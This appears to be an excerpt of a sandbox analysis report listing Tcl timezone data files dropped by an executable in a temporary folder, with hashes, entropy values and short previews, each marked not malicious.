                                                                                                                                                                                                                                                    SHA-256:628A9AE97682B98145588E356948996EAE18528E34A1428A6B2765CCAA7A8A1F
                                                                                                                                                                                                                                                    SHA-512:EE312624EC0193C599B2BDBFA57CC4EA7C68890955E0D888149172DF8F2095C553BFBB80BF76C1B8F3232F3A5863A519FF59976BBAEA622C64737890D159AA22
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Noronha)]} {. LoadTimeZoneFile America/Noronha.}.set TZData(:Brazil/DeNoronha) $TZData(:America/Noronha).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Brazil\East

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):186
                                                                                                                                                                                                                                                    Entropy (8bit):4.9019570219911275
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0tQJXvedVAIg20tQJX1bJHIAcGEtQJXv:SlSWB9IZaM3y7tIGdVAIgptExR90tIv
                                                                                                                                                                                                                                                    MD5:FBF6B9E8B9C93B1B9E484D88EF208F38
                                                                                                                                                                                                                                                    SHA1:44004E19A485B70E003687CB1057B8A2421D1BF0
                                                                                                                                                                                                                                                    SHA-256:C89E831C4A0525C3CEFF17072843386369096C08878A4412FB208EF5D3F156D8
                                                                                                                                                                                                                                                    SHA-512:4E518FC4CED0C756FF45E0EDE72F6503C4B3AE72E785651DE261D3F261D43F914721EFCEAB272398BC145E41827F35D46DE4E022EAF413D95F64E8B3BD752002
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Sao_Paulo)]} {. LoadTimeZoneFile America/Sao_Paulo.}.set TZData(:Brazil/East) $TZData(:America/Sao_Paulo).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Brazil\West

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):177
                                                                                                                                                                                                                                                    Entropy (8bit):4.853909262702622
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0znQZFwFVAIg20znQoCxL1bbAWVIAcGEznQb:SlSWB9IZaM3y7zn+wFVAIgpznzCxLxnJ
                                                                                                                                                                                                                                                    MD5:116F0F146B004D476B6B86EC0EE2D54D
                                                                                                                                                                                                                                                    SHA1:1F39A84EF3DFF676A844174D9045BE388D3BA8C0
                                                                                                                                                                                                                                                    SHA-256:F24B9ED1FAFA98CD7807FFFEF4BACA1BCE1655ABD70EB69D46478732FA0DA573
                                                                                                                                                                                                                                                    SHA-512:23BD7EC1B5ADB465A204AAA35024EE917F8D6C3136C4EA973D8B18B586282C4806329CEBE0EDBF9E13D0032063C8082EC0D84A049F1217C856943A4DDC4900D0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Manaus)]} {. LoadTimeZoneFile America/Manaus.}.set TZData(:Brazil/West) $TZData(:America/Manaus).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\CET

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7471
                                                                                                                                                                                                                                                    Entropy (8bit):3.710275786382764
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:ht6CvDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQlth:PSTRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:AE72690EF7063F0B9F640096204E2ECE
                                                                                                                                                                                                                                                    SHA1:4F815B51DA9BCA97DFF71D191B74D0190890F946
                                                                                                                                                                                                                                                    SHA-256:BB2C5E587EE9F9BF85C1D0B6F57197985663D4DFF0FED13233953C1807A1F11C
                                                                                                                                                                                                                                                    SHA-512:F7F0911251BC7191754AF0BA2C455E825BF16EA9202A740DC1E07317B1D74CDAF680E161155CC1BD5E862DCEE2A58101F419D8B5E0E24C4BA7134999D9B55C48
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:CET) {. {-9223372036854775808 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 1 CEST}. {-766623600 3600 0 CET}. {228877200 7200 1 CEST}. {243997200 3600 0 CET}. {260326800 7200 1 CEST}. {276051600 3600 0 CET}. {291776400 7200 1 CEST}. {307501200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {401850000 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\CST6CDT

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8227
                                                                                                                                                                                                                                                    Entropy (8bit):3.723597525146651
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:KxrIOdXkqbfkeTzZSJw5/9/yuvQ+hcrD57X0N41+IestuNEbYkzbXwDTIRqfhXbo:KxrIOdXkqbfNTzZSJw5/9/yuvQ6crD5r
                                                                                                                                                                                                                                                    MD5:B5AC3FA83585957217CA04384171F0FF
                                                                                                                                                                                                                                                    SHA1:827FF1FBDADDDE3754453E680B4E719A50499AE6
                                                                                                                                                                                                                                                    SHA-256:17CBE2F211973F827E0D5F9F2B4365951164BC06DA065F6F38F45CB064B29457
                                                                                                                                                                                                                                                    SHA-512:A56485813C47758F988A250FFA97E2DBD7A69DDD16034E9EF2834AF895E8A374EEB4DA3F36E6AD80285AC10F84543ECF5840670805082E238F822F85D635651F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:CST6CDT) {. {-9223372036854775808 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-84384000 -18000 1 CDT}. {-68662800 -21600 0 CST}. {-52934400 -18000 1 CDT}. {-37213200 -21600 0 CST}. {-21484800 -18000 1 CDT}. {-5763600 -21600 0 CST}. {9964800 -18000 1 CDT}. {25686000 -21600 0 CST}. {41414400 -18000 1 CDT}. {57740400 -21600 0 CST}. {73468800 -18000 1 CDT}. {89190000 -21600 0 CST}. {104918400 -18000 1 CDT}. {120639600 -21600 0 CST}. {126691200 -18000 1 CDT}. {152089200 -21600 0 CST}. {162374400 -18000 1 CDT}. {183538800 -21600 0 CST}. {199267200 -18000 1 CDT}. {215593200 -21600 0 CST}. {230716800 -18000 1 CDT}. {247042800 -21600 0 CST}. {262771200 -18000 1 CDT}. {278492400 -216

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Canada\Atlantic

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.754307292225081
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx02NEO4FVAIg202NEtYF0nalGe2IAcGE2NEOv:SlSWB9IZaM3y7UEO4FVAIgpUEqF0af2b
                                                                                                                                                                                                                                                    MD5:B0E220B9CD16038AAF3EA21D60064B62
                                                                                                                                                                                                                                                    SHA1:333410CB7D4F96EF836CDC8097A1DCE34A2B961A
                                                                                                                                                                                                                                                    SHA-256:6F71D7ED827C9EF6E758A44D2A998673E1225EB8005AD557A1713F5894833F92
                                                                                                                                                                                                                                                    SHA-512:F879F60E36C739280E8FC255D2792BB24BCA90A265F8F90B5FB85630D5A58CE4FDBD24EA5594924375C3CD31DBC6D49C06CBFA43C52D0B9A1E9D799914A164F7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Halifax)]} {. LoadTimeZoneFile America/Halifax.}.set TZData(:Canada/Atlantic) $TZData(:America/Halifax).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Canada\Central

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):186
                                                                                                                                                                                                                                                    Entropy (8bit):4.814426408072182
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0po4FVAIg20peRL0nPQox/h4IAcGEpov:SlSWB9IZaM3y7phFVAIgppOL0d490py
                                                                                                                                                                                                                                                    MD5:8374E381BC8235B11B7C5CA215FA112C
                                                                                                                                                                                                                                                    SHA1:181298556253D634B09D72BD925C4DBB92055A06
                                                                                                                                                                                                                                                    SHA-256:1B87273B264A3243D2025B1CFC05B0797CBC4AA95D3319EEE2BEF8A09FDA8CAD
                                                                                                                                                                                                                                                    SHA-512:12800E49B8094843F66454E270B4BE154B053E5FB453C83269AF7C27B965071C88B02AF7BB404E7F5A07277DB45E58D1C5240B377FC06172087BB29749C7543B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Winnipeg)]} {. LoadTimeZoneFile America/Winnipeg.}.set TZData(:Canada/Central) $TZData(:America/Winnipeg).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Canada\East-Saskatchewan

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):190
                                                                                                                                                                                                                                                    Entropy (8bit):4.860347334610986
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0sAzE5YyVAIg20sAzEvYvW60nbP2/8S64IAcGEsAz1:SlSWB9IZaM3y7hzipVAIgphzGCW60L5X
                                                                                                                                                                                                                                                    MD5:F5CB42BC029315088FAD03C9235FFB51
                                                                                                                                                                                                                                                    SHA1:7773ECE0B85D66E4FA207A26EE4395F38BAC4068
                                                                                                                                                                                                                                                    SHA-256:AF04A4558E31C9864B92FE3403011F7A2FBD837E1314A7BB5AF552D5AED06457
                                                                                                                                                                                                                                                    SHA-512:0533B9D98834866FAA3C6E67A6F61A8A22C2BFDBA8C5336388C0894FBA550611C9112515F17E20E7B3508EC2318D58EA7CA814EC10C3451954C3CC169EDA0F8C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Regina)]} {. LoadTimeZoneFile America/Regina.}.set TZData(:Canada/East-Saskatchewan) $TZData(:America/Regina).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Canada\Eastern

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):183
                                                                                                                                                                                                                                                    Entropy (8bit):4.7067203041014185
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0qMKLRXIVAIg20qMKLRI60nbHboxp4IAcGEqMKLRXv:SlSWB9IZaM3y7RQ+VAIgpRQ+60Dboxp2
                                                                                                                                                                                                                                                    MD5:22453AC70F84F34868B442E0A7BDC20A
                                                                                                                                                                                                                                                    SHA1:730049FF6953E186C197601B27AB850305961FD0
                                                                                                                                                                                                                                                    SHA-256:545B992E943A32210F768CB86DEF3203BE956EE03A3B1BC0D55A5CD18A4F064D
                                                                                                                                                                                                                                                    SHA-512:91FE33FAD3954019F632A771BCBD9FF3FDCCDA1F51DD25E0E5808A724F2D9B905E5E2DEE32D415BEA9A9ADB74186D83548584414BB130DF1A166D49373AC7BEF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Toronto)]} {. LoadTimeZoneFile America/Toronto.}.set TZData(:Canada/Eastern) $TZData(:America/Toronto).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Canada\Mountain

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):187
                                                                                                                                                                                                                                                    Entropy (8bit):4.768148288986999
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx07nKL5zFVAIg207nKLKN0nNYLo/4IAcGE7nKLun:SlSWB9IZaM3y77GzFVAIgp7DN0W8/49s
                                                                                                                                                                                                                                                    MD5:5E0D3D1A7E9F800210BB3E02DFF2ECD3
                                                                                                                                                                                                                                                    SHA1:F2471795A9314A292DEAA3F3B94145D3DE5A2792
                                                                                                                                                                                                                                                    SHA-256:A8B3A4D53AA1CC73312E80951A9E9CEA162F4F51DA29B897FEB58B2DF3431821
                                                                                                                                                                                                                                                    SHA-512:F80C7CDFE20E5FAD9E4BA457446F067ACE0C3F4659761E3B4A2422D3456CDE92C20589954DE5E0DC64619E3B6AB3A55AE0E0E783F8EFB24D74A5F6DFBF5ABB16
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Edmonton)]} {. LoadTimeZoneFile America/Edmonton.}.set TZData(:Canada/Mountain) $TZData(:America/Edmonton).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Canada\Newfoundland

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):191
                                                                                                                                                                                                                                                    Entropy (8bit):4.953647576523321
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0tVZMYFwFVAIg20tVZoYvxL0nJBJi6FBx/2IAcGEt3:SlSWB9IZaM3y7tgYmFVAIgptMqL0xdB7
                                                                                                                                                                                                                                                    MD5:3A4E193C8624AE282739867B22B7270A
                                                                                                                                                                                                                                                    SHA1:AC93EEDA7E8AB7E40834FFBA83BAE5D803CB7162
                                                                                                                                                                                                                                                    SHA-256:70EF849809F72741FA4F37C04C102A8C6733639E905B4E7F554F1D94737BF26B
                                                                                                                                                                                                                                                    SHA-512:BE2AACEE2A6F74520F4F1C0CCBBB750ED6C7375D4368023BAB419184F8F717D52981106C03F487B24A943907E60784136C0E5F8C1D5B3D1C67C20E23A4F412B3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/St_Johns)]} {. LoadTimeZoneFile America/St_Johns.}.set TZData(:Canada/Newfoundland) $TZData(:America/St_Johns).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Canada\Pacific

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):189
                                                                                                                                                                                                                                                    Entropy (8bit):4.839589386398345
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0oELSTAWFwVAIg20oELSTAQO0L0nie2IAcGEoELSTH:SlSWB9IZaM3y7ZLgXwVAIgpZLgJJL0Nu
                                                                                                                                                                                                                                                    MD5:6AA0FCE594E991D6772C04E137C7BE00
                                                                                                                                                                                                                                                    SHA1:6C53EE6FEBEC2BD5271DD80D40146247E779CB7B
                                                                                                                                                                                                                                                    SHA-256:D2858621DA914C3F853E399F0819BA05BDE68848E78F59695B84B2B83C1FDD2A
                                                                                                                                                                                                                                                    SHA-512:7B354BB9370BB61EB0E801A1477815865FDE51E6EA43BF166A6B1EED127488CC25106DEE1C6C5DC1EF3E13E9819451E10AFBC0E189D3D3CDE8AFFA4334C77CA3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Vancouver)]} {. LoadTimeZoneFile America/Vancouver.}.set TZData(:Canada/Pacific) $TZData(:America/Vancouver).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Canada\Saskatchewan

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                                                                                    Entropy (8bit):4.83938055689947
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0sAzE5YyVAIg20sAzEvYvW60nogS64IAcGEsAzEun:SlSWB9IZaM3y7hzipVAIgphzGCW60Hd9
                                                                                                                                                                                                                                                    MD5:927FD3986F83A60C217A3006F65A3B0A
                                                                                                                                                                                                                                                    SHA1:022D118024BFC5AE0922A1385288C3E4B41903DB
                                                                                                                                                                                                                                                    SHA-256:BB457E954DB625A8606DD0F372DA9BFFAA01F774B4B82A2B1CEE2E969C15ABC3
                                                                                                                                                                                                                                                    SHA-512:3EA932FA5416A9C817977F9D31C8A15C937A453B4D6A6409A7966E76D66A685C91F1117C82BEBEBA2AF5516556DA2BDEC898AD718C78FB8B690F31692174DA6C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Regina)]} {. LoadTimeZoneFile America/Regina.}.set TZData(:Canada/Saskatchewan) $TZData(:America/Regina).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Canada\Yukon

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):190
                                                                                                                                                                                                                                                    Entropy (8bit):4.841592909599599
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0peR2pVkvFVAIg20peR2zxL0nTOK8x/h4IAcGEpeRu:SlSWB9IZaM3y7peR2fkvFVAIgppeR2FF
                                                                                                                                                                                                                                                    MD5:9F2A7F0D8492F67F764F647638533C3F
                                                                                                                                                                                                                                                    SHA1:3785DACD1645E0630649E411DC834E8A4FB7F40B
                                                                                                                                                                                                                                                    SHA-256:F2A81B7E95D49CEC3C8952463B727129B4DC43D58ADC64BB7CAB642D3D191039
                                                                                                                                                                                                                                                    SHA-512:0133870BB96851ECD486D55FD10EB4BCB1678772C1BFFADE85FC5644AC8445CDB4C6284BEFFED197E9386C9C6EF74F5F718F2CB43C4C7B8E65FE413C8EC51CD0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Whitehorse)]} {. LoadTimeZoneFile America/Whitehorse.}.set TZData(:Canada/Yukon) $TZData(:America/Whitehorse).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Chile\Continental

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):189
                                                                                                                                                                                                                                                    Entropy (8bit):4.762021566751952
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0tfEJ5YyVAIg20tfEJvYvWAt0dKLRMyREGH/h4IAcB:SlSWB9IZaM3y7tfEJHVAIgptfEJAvN0+
                                                                                                                                                                                                                                                    MD5:B2BDB6C027FF34D624EA8B992E5F41AB
                                                                                                                                                                                                                                                    SHA1:425AB0D603C3F5810047A7DC8FD28FDF306CC2DB
                                                                                                                                                                                                                                                    SHA-256:F2E3C1E88C5D165E1D38B0D2766D64AA4D2E6996DF1BE58DADC9C4FC4F503A2E
                                                                                                                                                                                                                                                    SHA-512:6E5A8DC6F5D5F0218C37EE719441EBDC7EDED3708F8705A98AEF7E256C8DC5D82F4BF82C529282E01D8E6E669C4F843B143730AD9D8BBF43BCC98ECB65B52C9B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Santiago)]} {. LoadTimeZoneFile America/Santiago.}.set TZData(:Chile/Continental) $TZData(:America/Santiago).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Chile\EasterIsland

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.758503564906338
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqTQG7ZAJpVAIgObT7ZA6xL0bxOdBx/nUDH7ZAen:SlSWB9IZaM3ycJA3VAIgObJA6xL04dB4
                                                                                                                                                                                                                                                    MD5:E9DF5E3D9E5E242A1B9C73D8F35C9911
                                                                                                                                                                                                                                                    SHA1:9905EF3C1847CFF8156EC745779FCF0D920199B7
                                                                                                                                                                                                                                                    SHA-256:AA305BEC168C0A5C8494B81114D69C61A0D3CF748995AF5CCC3E2591AC78C90C
                                                                                                                                                                                                                                                    SHA-512:7707AC84D5C305F40A1713F1CBBED8A223553A5F989281CCDB278F0BD0D408E6FC9396D9FA0CCC82168248A30362D2D4B27EDEF36D9A3D70E286A5B668686FDE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Easter)]} {. LoadTimeZoneFile Pacific/Easter.}.set TZData(:Chile/EasterIsland) $TZData(:Pacific/Easter).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Cuba

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                    Entropy (8bit):4.8073098952422395
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx02TEMVFwVAIg202TEKN0lIAcGE2TEMv:SlSWB9IZaM3y76EHVAIgp6EKN0l906Eu
                                                                                                                                                                                                                                                    MD5:BA8EE8511A2013E791A3C50369488588
                                                                                                                                                                                                                                                    SHA1:03BF30F56FB604480A9F5ECD8FB13E3CF82F4524
                                                                                                                                                                                                                                                    SHA-256:2F9DFE275B62EFBCD5F72D6A13C6BB9AFD2F67FDDD8843013D128D55373CD677
                                                                                                                                                                                                                                                    SHA-512:29C9E9F4B9679AFD688A90A605CFC1D7B86514C4966E2196A4A5D48D4F1CF16775DFBDF1C9793C3BDAA13B6986765531B2E11398EFE5662EEDA7B37110697832
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Havana)]} {. LoadTimeZoneFile America/Havana.}.set TZData(:Cuba) $TZData(:America/Havana).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\EET

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7189
                                                                                                                                                                                                                                                    Entropy (8bit):3.6040923024580884
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:WB8kMKVCy+Hk+PVqVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lf:AroXPzh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                    MD5:9AE4C7EC014649393D354B02DF00F8B9
                                                                                                                                                                                                                                                    SHA1:D82195DEF49CFFEAB3791EA70E6D1BB8BC113155
                                                                                                                                                                                                                                                    SHA-256:4CB6582052BE7784DD08CE7FD97ACC56234F07BCF80B69E57111A8F88454908E
                                                                                                                                                                                                                                                    SHA-512:6F0C138AF98A4D4A1028487C29267088BD4C0EC9E7C1DB9818FA31A61C9584B67B3F5909C6E6FDB0F7183629E892A77BA97654D39FCE7DDEF6908F8146B7BE72
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
